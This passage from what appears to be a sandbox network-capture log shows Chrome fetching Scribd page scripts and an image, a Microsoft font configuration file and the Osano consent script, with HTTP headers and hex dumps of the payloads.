                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 29 2c 54 28 74 68 69 73 2c 22 68 61 6e 64 6c 65 45 78 69 74 65 64 22 2c 28 28 29 3d 3e 7b 74 68 69 73 2e 75 70 64 61 74 65 50 61 67 65 57 69 64 74 68 73 28 29 7d 29 29 2c 54 28 74 68 69 73 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 2c 28 28 29 3d 3e 7b 63 6f 6e 73 74 7b 65 78 70 61 6e 64 65 64 3a 65 7d 3d 74 68 69 73 2e 73 74 61 74 65 3b 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 65 78 70 61 6e 64 65 64 3a 21 65 7d 29 2c 65 3f 28 30 2c 45 2e 73 78 29 28 22 6d 65 74 61 64 61 74 61 50 72 6f 6d 69 6e 65 6e 63 65 54 65 73 74 3a 61 63 63 6f 72 64 69 6f 6e 3a 63 6f 6c 6c 61 70 73 65 42 75 74 74 6f 6e 3a 63 6c 69 63 6b 22 29 3a 28 30 2c 45 2e 73 78 29 28 22 6d 65 74 61 64 61 74 61 50 72 6f 6d 69 6e 65 6e 63 65 54 65 73 74 3a 61 63 63 6f 72 64 69 6f 6e 3a 65 78
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ),T(this,"handleExited",(()=>{this.updatePageWidths()})),T(this,"handleClick",(()=>{const{expanded:e}=this.state;this.setState({expanded:!e}),e?(0,E.sx)("metadataProminenceTest:accordion:collapseButton:click"):(0,E.sx)("metadataProminenceTest:accordion:ex
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 76 2e 41 2c 7b 62 75 74 74 6f 6e 43 6f 6d 70 6f 6e 65 6e 74 3a 70 2e 72 70 2c 6c 6f 63 61 74 69 6f 6e 3a 43 2e 42 37 2e 4d 4f 42 49 4c 45 5f 4d 45 54 41 44 41 54 41 7d 29 29 29 7d 72 65 6e 64 65 72 45 78 70 61 6e 64 65 64 49 6e 66 6f 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 29 28 22 65 78 70 61 6e 64 65 64 5f 69 6e 66 6f 22 2c 7b 68 61 73 5f 65 78 74 72 61 63 74 65 64 5f 74 69 74 6c 65 3a 74 68 69 73 2e 70 72 6f 70 73 2e 65 78 74 72 61 63 74 65 64 54 69 74 6c 65 7d 29 7d 2c 74 68 69 73 2e 70 72 6f 70 73 2e 69 73 4c 6f 67 67 65 64 49 6e 3f 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 68 2c 7b 69 6e 6c 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: reateElement(v.A,{buttonComponent:p.rp,location:C.B7.MOBILE_METADATA})))}renderExpandedInfo(){var e;return s.createElement("div",{className:o()("expanded_info",{has_extracted_title:this.props.extractedTitle})},this.props.isLoggedIn?s.createElement(h,{inli
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 75 74 3a 35 30 30 7d 2c 28 74 3d 3e 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 29 28 22 61 75 74 6f 5f 5f 61 70 70 5f 70 61 67 65 5f 62 6f 64 79 5f 6d 65 74 61 64 61 74 61 5f 69 6e 66 6f 5f 61 63 63 6f 72 64 69 6f 6e 22 2c 74 2c 7b 65 78 70 61 6e 64 65 64 3a 65 2c 68 61 73 5f 64 65 73 63 72 69 70 74 69 6f 6e 3a 6c 7d 29 2c 72 65 66 3a 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2c 73 74 79 6c 65 3a 61 2c 22 64 61 74 61 2d 65 32 65 22 3a 69 7d 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 75 74 74 6f 6e 22 2c 7b 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 61 63 74 69 76 65 5f 61 72 65 61 22 2c 6f 6e 43 6c 69 63 6b 3a 74 68 69 73 2e 68 61 6e 64 6c 65 43 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ut:500},(t=>s.createElement("div",{className:o()("auto__app_page_body_metadata_info_accordion",t,{expanded:e,has_description:l}),ref:this.container,style:a,"data-e2e":i},s.createElement("button",{type:"button",className:"active_area",onClick:this.handleCl


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        14192.168.2.1649728151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC385OUTGET /975ow02iyodmurb1/images/1-4596bc3e1d.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: html.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC934INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 10380
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: inline;filename=1-4596bc3e1d.jpg
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "iAE0xVyOLz3op1bUzbLMA5Ciok7P1jl06ujLIugLTTw"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=26973 idim=904x639 ifmt=jpeg ofsz=10380 odim=904x639 ofmt=jpeg
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010210
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Id-2: hDmG2j0RkBp9LyVSist8+SM/J38fGgXY+zB4pj82yI5PKbzjPTIRcWzX6SUuCh0X6QOZ068VGjQ=
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Request-Id: 9KH9CRBCDX9CPNC0
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Version-Id: DqeMoZzx9dzpVE5jWUq7pdD0_6ojOY5Z
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100077-IAD, cache-ewr-kewr1740042-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 2, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522360.710791,VS0,VE7
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 0c 6c 63 6d 73 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 dc 00 01 00 19 00 03 00 29 00 39 61 63 73 70 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 6c 63 6d 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 5e 63 70 72 74 00 00 01 5c 00 00 00 0b 77 74 70 74 00 00 01 68 00 00 00 14 62 6b 70 74 00 00 01 7c 00 00 00 14 72 58 59 5a 00 00 01 90 00 00 00 14 67 58 59 5a 00 00 01 a4 00 00 00 14 62 58 59 5a 00 00 01 b8 00 00 00 14 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: JFIFICC_PROFILElcmsmntrRGB XYZ )9acspAPPL-lcmsdesc^cprt\wtpthbkpt|rXYZgXYZbXYZr
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 c0 75 ae 70 00 00 00 00 00 11 40 00 40 00 00 00 00 00 01 10 00 14 00 00 40 00 40 00 00 00 00 00 00 01 00 10 50 00 1b 0e d7 dd ba 0f 0d 8f cb 0c 79 b0 ed 7d db a0 f0 d8 fc b0 cc e2 5a 6d 6f 2f 76 07 55 7b 39 e0 32 5a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 c0 75 ae 70 00 00 00 01 14 00 04 54 00 00 00 00 00 00 04 01 14 00 00 00 40 40 00 00 00 00 00 00 00 00 11 50 00 00 01 b0 ed 7d db a0 f0 d8 fc b0 c7 9b 0e d7 dd ba 0f 0d 8f cb 0c ce 25 a6 de f2 f7 60 75 57 b3 9e 03 25 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: up@@@@Py}Zmo/vU{92Z@upT@@P}%`uW%
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 00 00 00 00 00 31 20 1d 63 9d 00 00 00 00 01 01 14 00 00 10 10 14 00 40 00 00 00 00 00 00 01 15 00 00 00 00 00 01 40 40 00 40 00 00 40 1b 1e d7 dd 9a 0f 0d 8f cb 0c 71 b1 ed 7d d9 a0 f0 d8 fc b0 cc e2 3a 6d 6f 2f 76 0b 55 7b 39 e0 32 9a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 01 3d 92 0e 9f e3 fd a7 eb 3f a2 de e3 e3 fd a7 eb 3f a2 de e6 70 34 3a 4b 7f 2a 99 5d 75 df 8d 2d 1f e3 fd a7 eb 3f a2 de e3 e3 fd a7 eb 3f a2 de e6 70 2f 49 6f e5 51 d7 5d f8 d2 d1 fe 3f da 7e b3 fa 2d ee 3e 3f da 7e b3 fa 2d ee 67 01 d2 5b f9 54 75 d7 7e 34 b4 7f 8f f6 9f ac fe 8b 7b 8f 8f f6 9f ac fe 8b 7b 99 c0 74 96 fe 55 1d 75 df 8d 2d 1f e3 fd a7 eb 3f a2 de e3 e3 fd a7 eb 3f a2 de e6 70 1d 25 bf 95 47 5d 77 e3 4b 47 f8 ff 00 69 fa cf e8 b7 b8 f8 ff 00 69 fa cf e8 b7 b9 9c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1 c@@@@@q}:mo/vU{92 =??p4:K*]u-??p/IoQ]?~->?~-g[Tu~4{{tUu-??p%G]wKGii
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 71 f0 57 fb fa 72 e6 6b f7 9d 06 82 26 32 65 e9 64 fa 3a 75 db f1 f6 7e 2e 86 3d 31 c7 d2 eb d0 db a3 ed e9 c7 3f d1 f5 89 c7 5d fc a2 6a cb f5 d9 f3 98 c2 5b fc 66 29 cf ed 35 5e 88 63 9e bd 2e a6 6b ff 00 ae 48 e7 f9 c3 c9 6b b6 fd 56 83 2f c1 ea 31 f1 33 fe 9b 47 5d 6d 1f 64 b4 ed bf 77 d1 ee 35 9f 81 bf 17 8e da 5b aa d1 ef 7d 77 2d 0e 3d 7e 93 2e 0b 44 73 31 cd 2d 3f f1 b4 76 4b f5 6b 19 7e d5 71 4d dc e6 3d f3 f5 87 e6 bc 35 ab 94 4d 56 fd 7d b2 f4 63 ef 53 a1 f4 57 55 a8 c7 4c b9 b3 57 0d 6d 1c f4 78 99 b7 1f 6c 75 70 ec bd 1f d8 6d 8a f6 d4 eb 31 f1 7a da 63 1d 27 d5 31 d5 d2 f7 3d 7e 5c d8 b0 52 72 65 c9 5a 52 3b 66 d3 c4 3e b8 9c 6d 5c dc 96 67 79 f5 fa 7c ec 61 63 97 9a e7 d3 cf 62 f4 53 6c a4 7c ff 00 85 c9 3e d9 b7 1f d3 84 cb e8 9e db 78 9f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qWrk&2ed:u~.=1?]j[f)5^c.kHkV/13G]mdw5[}w-=~.Ds1-?vKk~qM=5MV}cSWULWmxlupm1zc'1=~\RreZR;f>m\gy|acbSl|>x
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: af a6 1c f9 74 b9 2d c4 65 98 9a 7f fa 8f 57 e2 f6 ba fd 1e 3d 76 97 2e 9e fd 51 68 ea 9f 64 c7 64 b1 da da d4 b5 6d 59 98 b4 4c 4c 4c 76 c4 c3 4d d8 b7 aa ee 18 be 0b 2f 15 d4 52 3e 74 7a ad 1e d8 fe ec 9c 75 8a a9 ae 2f d1 fd fe a7 cb 47 0b 76 9a a9 fe 2a ff 00 a7 81 d7 ed 7a cd be fc 67 c7 f3 67 b2 f1 d7 59 fc 5d 7b 6d bd 29 92 b3 5b d6 2d 59 8e 26 26 39 89 75 d1 b3 6d 51 6e 94 68 70 f3 ff 00 e5 6d f1 2c a9 ca ba 3b fe bd ca f0 59 cf e3 57 6f db 37 db 36 8d 56 e5 7f f2 eb c6 28 98 8b e4 9e c8 fb bd b2 d5 74 f8 31 e9 b0 63 c3 8e 38 a5 2b 15 8f c1 fb ad 29 4a c5 69 58 ad 63 b2 22 38 87 9d df b7 9c 5a 3c 19 34 f8 b2 73 a9 bd 78 f9 bf f0 89 f5 cf db ec 79 ae 5d bb 8b b9 4d 31 4e 51 9f 68 f1 fb 97 da 8b 76 f0 d4 55 54 cf 7f 79 7a 0c 59 b1 66 ac db 1d e2 d5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t-eW=v.QhddmYLLLvM/R>tzu/Gv*zggY]{m)[-Y&&9umQnhpm,;YWo76V(t1c8+)JiXc"8Z<4sxy]M1NQhvUTyzYf
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 22 03 ab 73 c0 20 00 20 00 00 00 00 00 00 00 80 08 28 00 00 00 00 00 0a 20 00 02 00 00 20 00 00 00 20 00 00 00 00 28 d8 f6 be ec d0 78 6c 5e 58 63 8d 8f 6b ee cd 07 86 c5 e5 86 6f 11 d3 6f 79 7b 70 5a ab d9 cf 01 94 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 22 03 ab 73 c2 02 00 00 00 00 00 00 00 00 00 8a 80 00 00 00 00 00 a0 20 00 20 00 00 20 00 00 02 00 00 00 00 02 80 00 d8 f6 ae ec d0 78 6c 5e 58 63 8d 8f 6a ee cd 07 86 c5 e5 86 6f 11 d3 6f 79 7b 70 5a ab d9 cf 01 94 d1 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "s ( (xl^Xckooy{pZ"s xl^Xcjooy{pZ
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 80 0e a9 cf 00 22 a0 00 00 00 00 00 28 08 00 08 00 00 08 00 00 00 80 00 00 00 00 a0 00 02 20 00 00 00 02 00 00 00 0a 36 5d ab bb 34 1e 1b 17 96 18 d3 65 da bb b3 41 e1 b1 79 61 9b c4 34 db de 5e dc 1e aa f6 73 c0 65 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 88 00 ea 5c f0 8a 82 80 00 00 00 0a 00 08 02 00 00 00 02 00 00 00 02 00 00 00 28 00 00 00 80 00 08 00 02 00 00 00 00 28 d9 76 ae ec d0 78 6c 5e 58 63 4d 97 6a ee cd 07 86 c5 e5 86 6f 10 d3 6f 79 7b 70 7a ab d9 cf 1f 8c 97 a6 3a 5a f7 9e 2b 58 99 99 f6 44 75 bf 38 b3 62 cd 48 be 2c 95 bd 67 b2 6b 3c c3 2d a1 94 e5 9e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "( 6]4eAya4^se\((vxl^XcMjooy{pz:Z+XDu8bH,gk<-
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC734INData Raw: 5d b5 7a 3d 57 c0 64 bc 71 78 e8 f4 a2 df 6f 59 34 d5 de 63 de 56 9b d8 7f f4 e9 ab 96 62 9a 26 22 7d b3 cf fb 75 18 3d 24 cf 1b 7e aa d7 e8 df 36 3b d6 b4 bf 1c 45 ba 5c f5 cc 7e 0e 26 3d ff 00 55 83 26 1c 96 d7 46 a2 b6 98 f8 5c 7f 07 d1 e8 fd d3 c4 3d 47 c5 1f 09 a0 be 93 53 a8 be 69 b4 f3 f0 93 11 13 13 ea e1 f0 d2 6d 3a fc 59 71 4e 5d ce d7 c5 8f b2 b1 48 8e 94 7b 27 9e 4c ab ed dc 8b b8 4c ae 7e 14 fa cf 6f 31 97 b7 67 79 8a 9d 0a f1 d2 b5 b9 9e 79 b4 f2 fa a2 be ac d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 3b fe 3c 99 34 d8 a2 94 b5 a7 e1 79 e2 b1 cf aa 7d 8e 8f 6e d3 ea 2b 9a f3 6c 39 22 3e 0e 7b 6b 31 eb 87 b9 1f 69 bd 33 85 b9 87 ca 32 ae 99 8c f7 79 2a c2 44 e2 a8 c4 73 ce 74 cc 4e 5b 3c f6 0c 59 23
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]z=WdqxoY4cVb&"}u=$~6;E\~&=U&F\=GSim:YqN]H{'LL~o1gyyt;<4y}n+l9">{k1i32y*DstN[<Y#


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        15192.168.2.164972923.218.208.109443
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                                        X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=258437
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        16192.168.2.164973018.165.220.244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC412OUTGET /AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cmp.osano.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC873INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 308493
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "5e72c3e86fabeff18c5f534ac6f63214"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 22 May 2024 19:34:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 ad4641cb3263eb2a4233d70631a033f6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: OHIH4C9Xx8t71if8siNpxJ4IVuA0McxocDEI6zLIU_eXzDEdKI798g==
                                                                                                                                                                                                                                                                                                                                                                                        Age: 4
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=86400, s-maxage=86400, must-revalidate, proxy-revalidate, no-transform
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6f 73 61 6e 6f 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 35 35 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 74 2e 53 53 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 72 28 37 31 37 29 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 2c 74 3d 5b 5d 2c 72 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 7b 65 6e 68 61 6e 63 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6f 2e 63 6f 6d 70 6f 73 65 2e 61 70 70 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! For license information please see osano.js.LICENSE.txt */(()=>{"use strict";var e={558:(e,t,r)=>{t.SS=void 0;var o=r(717),n=function(){var e=[],t=[],r=void 0;return{enhancer:function(e){return r=e,function(e){return function(r){return o.compose.appl
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 6c 75 65 3a 6e 2c 68 74 74 70 6f 6e 6c 79 3a 61 2c 53 65 63 75 72 65 3a 69 3d 21 31 2c 73 65 63 75 72 65 3a 63 3d 69 2c 70 61 74 68 3a 73 2c 64 6f 6d 61 69 6e 3a 6c 2c 65 78 70 69 72 65 73 3a 70 2c 22 6d 61 78 2d 61 67 65 22 3a 64 2c 53 61 6d 65 73 69 74 65 3a 75 3d 22 6c 61 78 22 2c 53 61 6d 65 53 69 74 65 3a 67 3d 75 2c 73 61 6d 65 73 69 74 65 3a 76 3d 67 2c 69 67 6e 6f 72 65 3a 6d 7d 3d 72 2c 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 73 65 63 75 72 65 3d 22 22 3d 3d 3d 63 7c 7c 21 21 63 2c 76 6f 69 64 20 30 21 3d 3d 73 26 26 28 68 2e 70 61 74 68 3d 73 2e 72 65 70 6c 61 63 65 28 2f 5b 27 22 5d 2f 67 2c 22 22 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6c 26 26 28 68 2e 64 6f 6d 61 69 6e 3d 6c 29 2c 76 6f 69 64 20 30 21 3d 3d 64 3f 68 5b 22 6d 61 78 2d 61 67 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lue:n,httponly:a,Secure:i=!1,secure:c=i,path:s,domain:l,expires:p,"max-age":d,Samesite:u="lax",SameSite:g=u,samesite:v=g,ignore:m}=r,h={};return h.secure=""===c||!!c,void 0!==s&&(h.path=s.replace(/['"]/g,"")),void 0!==l&&(h.domain=l),void 0!==d?h["max-age
